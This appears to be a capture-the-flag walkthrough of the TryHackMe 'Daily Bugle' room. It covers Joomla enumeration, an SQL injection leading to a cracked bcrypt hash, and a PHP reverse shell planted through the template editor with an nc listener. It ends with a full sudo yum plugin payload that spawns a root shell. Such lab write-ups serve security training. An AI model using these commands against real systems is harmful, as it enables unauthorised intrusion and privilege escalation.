TryHackMe Room: https://tryhackme.com/room/dailybugle
Difficulty Rated: Hard.
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
Firstly let’s do a quick nmap scan to see what ports are open.
nmap -sV -p- -vv IP
We have three ports open 80 (HTTP), 22 (ssh) and 3306 (MariaDB), since it has an open HTTP port then surely it must have a webpage or even some sort of content.
It looks like we have a Joomla CMS setup, and a post about someone.
Let’s see what else this website is hiding from us, let’s get the go buster going!
gobuster dir -u http://10.10.181.48/ -t 50 -w directory-list-2.3-medium.txt
The administrator page requires a login, which we don’t have yet sadly.
Flag2: “What is the Joomla version?” So we need to find what version of Joomla is running here, OWASP has a tool which can do just that for us!
perl joomscan.pl -u http://10.10.181.48/
Flag3: “Instead of using SQLMap, why not use a python script! What is Jonah’s cracked password?”
Flag 3 is giving us a hint here, we know the version of Joomla, and if we do a quick Google search, we can see that the version has an exploit.
We found our user, but the password encrypted with Bcrypt “3200 – Hashcat” I guess now it’s time to crack it, using Hashcat and rockyou.txt.
hashcat -D 2 -m 3200 HASHFILE WORDLIST
Now we can log in into the administrator page, now that we have accessed our next goal to try and get a reverse shell. There are two methods on how we can do this.
Method one is to upload the shell within the uploader, but first, you must allow .php and other files to be uploaded. System – Global Configuration – Media, once edited you can upload your shell file freely (Hopefully?)
Method two is the most common, and that is to edit the theme itself and include your own reverse shell PHP shell and refresh the page to get your shell started. You can gain a copy of the PHP shell here. Once you have it downloaded and extracted ensure you change to your IP and your chosen port! (Or it won’t connect back to anything).
Before we upload our shell, we should firstly set up NC on our attacker system.
nc -nvlp 1234
“1234” is the port, ensure you change it to the one you set within your PHP shell, an IP address isn’t needed as listens to all devices but only on the given port.
Once you’re ready to head to the theme editor, Templates – Templates – Protostar Details and Files. You should see this screen.
Now we have our shell into the system lets see what users are on this system.
We have jjameson and root. Let’s try and access jjameson home; dang looks like we can’t as we don’t have the correct permissions as were only running as apache.
Let’s see if we can sudo -l, sadly no luck here. Let’s see what distro is running here as we need to get higher permissions if we do want to get the last two flags!
It doesn’t look like much here can help us sadly, let’s have a more in-depth look into the Joomla setup.
cd /var/www/html && ls
Using cat, we can see the file has much information, but the “password” really stands out here, I wonder if that gives us ssh access to jjameson?
Now we need to get Flag5, and we can complete this room, the only issue here is. Flag5 is root access only, and we don’t have root access. I guess it’s time to bypass our restrictions and get root!
If we use the command sudo -l we can see
“(ALL) NOPASSWD: /usr/bin/yum”, we can abuse yum and get root!
Using the following:
TF=$(mktemp -d) cat >$TF/x<<EOF [main] plugins=1 pluginpath=$TF pluginconfpath=$TF EOF cat >$TF/y.conf<<EOF [main] enabled=1 EOF cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh') EOF sudo yum -c $TF/x --enableplugin=y
That’s it! We started off gaining admin access to Joomla; we uploaded a shell and gained access to the system. We used our shell to gain higher permissions and now were root!
This room created by TryHackMe. Thank you so much for the fun room!